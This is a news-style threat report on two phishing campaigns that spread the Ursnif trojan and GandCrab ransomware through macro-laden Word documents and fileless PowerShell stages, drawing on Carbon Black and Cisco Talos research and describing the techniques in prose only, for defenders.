Security researchers have identified two distinct malware campaigns targeting systems through phishing strategies, one distributing both the Ursnif data-stealing trojan and GandCrab ransomware, while the other focuses solely on Ursnif. These threats originate from two separate cybercriminal groups but exhibit several operational similarities. Both campaigns initiate through phishing emails containing Microsoft Word attachments embedded with malicious macros, which then leverage PowerShell to deploy fileless malware on victims’ machines.
Ursnif, known for its data theft abilities, can capture sensitive information, including banking credentials and keystrokes. It also collects system information and can deploy additional backdoors to further compromise targeted systems. GandCrab, discovered last year, exemplifies ransomware behavior, encrypting victim files and demanding payment in cryptocurrency—specifically DASH, which is notoriously difficult to trace.
The first campaign was brought to light by security experts from Carbon Black, who uncovered around 180 variants of Microsoft Word documents containing harmful Visual Basic for Applications (VBA) macros. Upon activation, these macros execute a PowerShell script that conducts a series of actions to introduce both Ursnif and GandCrab into the infected system.
Encoded in base64, the PowerShell script executes a secondary stage of infection, designed to download the malware payloads. This initial payload assesses the architecture of the target system and retrieves further malicious components. The actions embedded in this script provide the attackers a degree of stealth, complicating detection by conventional antivirus solutions.
Researchers indicated that this PowerShell script, a modified version of the Empire Invoke-PSInject module, fetches an encoded Portable Executable (PE) file from memory and integrates it into the ongoing PowerShell process. The ultimate goal of this procedure is the installation of GandCrab, effectively locking victims out of their systems until a ransom is fulfilled.
Moreover, the malware verifies the system’s specifications and concurrently downloads an Ursnif executable, which it runs to conduct system reconnaissance, monitor web traffic, and relay collected data to the attackers’ command and control server. Approximately 120 different Ursnif variants were reportedly hosted on specific domains during this campaign, demonstrating the extensiveness of this malware’s operational strategy.
In a parallel effort, Cisco Talos detected a second malware campaign that exploits Microsoft Word documents infused with harmful VBA macros to deliver an alternative version of Ursnif. This less complex attack compromises systems in stages, beginning from phishing emails and progressing to executing PowerShell commands to maintain a fileless presence. The payload then captures sensitive system data, archives it, and transmits the findings to its command-and-control server using secure HTTPS connections.
Notably, the tactics employed in both campaigns align closely with the MITRE ATT&CK framework, specifically targeting initial access through phishing, maintaining persistence via PowerShell execution, and data collection focused on system exfiltration. Researchers from Talos have outlined indicators of compromise, including filenames associated with these operations, which organizations can utilize to preemptively identify and mitigate the risks of Ursnif infections before they penetrate networks.
As cyber threats evolve, understanding these tactics and strategies enables businesses to fortify their cybersecurity defenses, emphasizing the critical need for vigilance and proactive measures against such multifaceted attacks.
